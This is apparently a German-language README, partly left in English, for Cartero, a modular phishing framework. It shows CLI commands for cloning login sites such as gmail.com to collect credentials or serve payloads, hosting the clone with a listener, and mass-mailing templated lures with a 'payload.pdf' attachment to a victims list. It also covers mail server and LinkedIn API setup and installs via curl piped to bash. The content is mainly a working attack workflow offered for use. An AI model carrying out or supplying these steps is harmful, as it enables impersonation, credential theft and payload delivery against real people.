
Modulares Phishing-Framework mit CLI zum Klonen von Websites, Senden von E-Mails mit Vorlagen und Starten von Phishing-Kampagnen per E-Mail, SMS, iMessage und LinkedIn.
http://section9labs.github.io/Cartero/
Ein robustes Phishing-Framework mit einer vollwertigen CLI-Schnittstelle. Das Projekt entstand aus der Notwendigkeit heraus, nach jahrelanger Arbeit mit Tools, die einfach nicht das taten, was sie sollten. Obwohl es viele Projekte da draußen gibt, konnten wir keine geeignete Lösung finden, die uns sowohl Benutzerfreundlichkeit als auch Anpassbarkeit bot.
Cartero ist ein modulares Projekt, das in Befehle unterteilt ist, die unabhängige Aufgaben ausführen (d. h. Mailer, Cloner, Listener, AdminConsole usw.). Darüber hinaus verfügt jeder Unterbefehl über wiederholbare Konfigurationsoptionen, um deine Arbeit zu konfigurieren und zu automatisieren.
Wenn wir zum Beispiel gmail.com klonen wollten, müssen wir lediglich die folgenden Befehle ausführen.```shell ❯❯❯ ./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com ❯❯❯ ./cartero Listener --webserver /tmp/gmail_com -p 80 Launching mongodb Puma starting in single mode...
Sobald wir eine Website am Laufen haben, können wir einfach den Mailer-Befehl verwenden, um vorlagenbasierte E-Mails an unsere Opfer zu senden:```shell
❯❯❯ ./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>"
Sending [email protected]
Sending [email protected]
Sending [email protected]
Tritt unserer Slack-Community unter https://carteroslack.herokuapp.com/ bei.
Verwende brew 2.1.5 ruby als Standard-Ruby-Bibliothek```shell ❯❯❯ curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash
Verwendung der RVM 2.1.5 Ruby-Installation```shell
❯❯❯ curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash -s -- -r
❯❯❯ \curl -sSL https://get.rvm.io | bash -s stable --ruby
##### MongoDB
Cartero verwendet die MongoDB- und MongoID-Bibliothek, um Daten auf der Listener- und Admin-Seite zu speichern.
Auf OSX:```shell
❯❯❯ brew install mongodb
Auf Ubuntu / Kali / Debian```shell ❯❯❯ apt-get install mongodb
Auf Arch Linux```
❯❯❯ pacman -Syu mongodb
❯❯❯ git clone https://github.com/section9labs/Cartero ❯❯❯ cd Cartero ❯❯❯ gem install bundle ❯❯❯ bundle install ❯❯❯ cd bin
### Verwendung
### Befehle
Cartero ist ein sehr leistungsstarkes, einfach zu bedienendes CLI.```shell
❯❯❯ ./cartero
Usage: cartero [options]
List of Commands:
AdminConsole, AdminWeb, Mailer, Cloner, Listener, Servers, Templates
Global options:
--proxy [HOST:PORT] Sets TCPSocket Proxy server
-c, --config [CONFIG_FILE] Provide a different cartero config file
-v, --[no-]verbose Run verbosely
-p [PORT_1,PORT_2,..,PORT_N], Global Flag fo Mailer and Webserver ports
--ports
-m, --mongodb [HOST:PORT] Global Flag fo Mailer and Webserver ports
-d, --debug Sets debug flag on/off
--editor [EDITOR] Edit Server
Common options:
-h, --help [COMMAND] Show this message
--list-commands Prints list of commands for bash completion
--version Shows cartero CLI version
Dies ist ein einfacher Wrapper für MongoDB, der es uns ermöglicht, die Datenbank mit den entsprechenden Befehlen und auf dem korrekten ~/.cartero-Pfad zu starten und zu stoppen.```shell ❯❯❯ ./cartero Mongo Usage: Cartero Mongo [options] -s, --start Start MongoDB -k, --stop Stop MongoDB -r, --restart Restart MongoDB -b, --bind [HOST:PORT] Set MongoDB bind_ip and port
Common options: -h, --help Show this message --list-options Show list of available options
#### Cloner
Ein WebSite-Cloner, mit dem wir eine Website herunterladen und in eine Cartero-WebServer-Anwendung konvertieren können.
Wir können die Website schnell und einfach anpassen, um Anmeldedaten zu sammeln, Server-Payloads bereitzustellen oder die Website für beliebig viele Zwecke vollständig zu modifizieren.```shell
❯❯❯ ./cartero Cloner
Usage: Cartero Cloner [options]
-U, --url [URL_PATH] Full Path of site to clone
-W, --webserver [SERVER_NAME] Sets WebServer name to use
-p, --path [PATH] Sets path to save webserver
-P, --payload [PAYLOAD_PATH] Sets payload path
--useragent [UA_STRING] Sets user agent for cloning
--wget Use wget to clone url
--apache Generate Apache Proxy conf
Common options:
-h, --help Show this message
--list-options Show list of available options
By default the command uses our Ruby implementation to download and convert links to render, but we also support a --wget option that will use the local wget system command.
The listener is responsible for running the WebServer created through Cloner or a manually created site. By default we present a very simple website if none is provided.```shell ❯❯❯ ./cartero Listener Usage: Cartero Listener [options] -i, --ip [1.1.1.1] Sets IP interface, default is 0.0.0.0 -p [PORT_1,PORT_2,..,PORT_N], Sets Email Payload Ports to scan --ports -s, --ssl Run over SSL. [this also requires --sslcert and --sslkey] -C, --sslcert [CERT_PATH] Sets Email Payload Ports to scan -K, --sslkey [KEY_PATH] Sets SSL key to use for Listener. -V, --views [VIEWS_FOLDER] Sets SSL Certificate to use for Listener. -P, --public [PUBLIC_FOLDER] Sets a Sinatra public_folder -W [WEBSERVER_FOLDER], Sets the sinatra full path from cloner. --webserver --payload [PAYLOAD] Sets a payload download to serve on /download --customapp [CUSTOM_SINATRA] Sets a custom Sinatra::Base WebApp. Important, WebApp name should be camelized of filename
Common options: -h, --help Show this message --list-options Show list of available options
Die WebServer unterstützen SSL-Schlüssel und virtuelle Hosts über mehrere IPs, Hostnamen und Ports hinweg.
#### Server
Um E-Mail-Kampagnen zu versenden, müssen wir E-Mail-Server einrichten, und dieser Befehl ermöglicht es Cartero, Server zu erstellen, zu speichern und aufzulisten. Alle Daten werden im Konfigurationsverzeichnis ~/.cartero gespeichert.```shell
./cartero Servers
Usage: Cartero Servers [options]
-a, --add [NAME] Add Server
-e, --edit [NAME] Edit Server
-d, --delete [NAME] Edit Server
-l, --list List servers
Configuration options:
-T, --type [TYPE] Set the type
-U, --url [DOMAIN] Set the Mail or WebMail url/address
-M, --method [METHOD] Sets the WebMail Request Method to use [GET|POST]
--api-access [API_KEY] Sets the Linkedin API Access Key
--api-secret [API_SECRET] Sets the Linkedin API Secret Key
--oauth-token [OAUTH_TOKEN] Sets the Linkedin OAuth Token Key
--oauth-secret [OAUTH_SECRET]
Sets the Linkedin OAuth Secret Key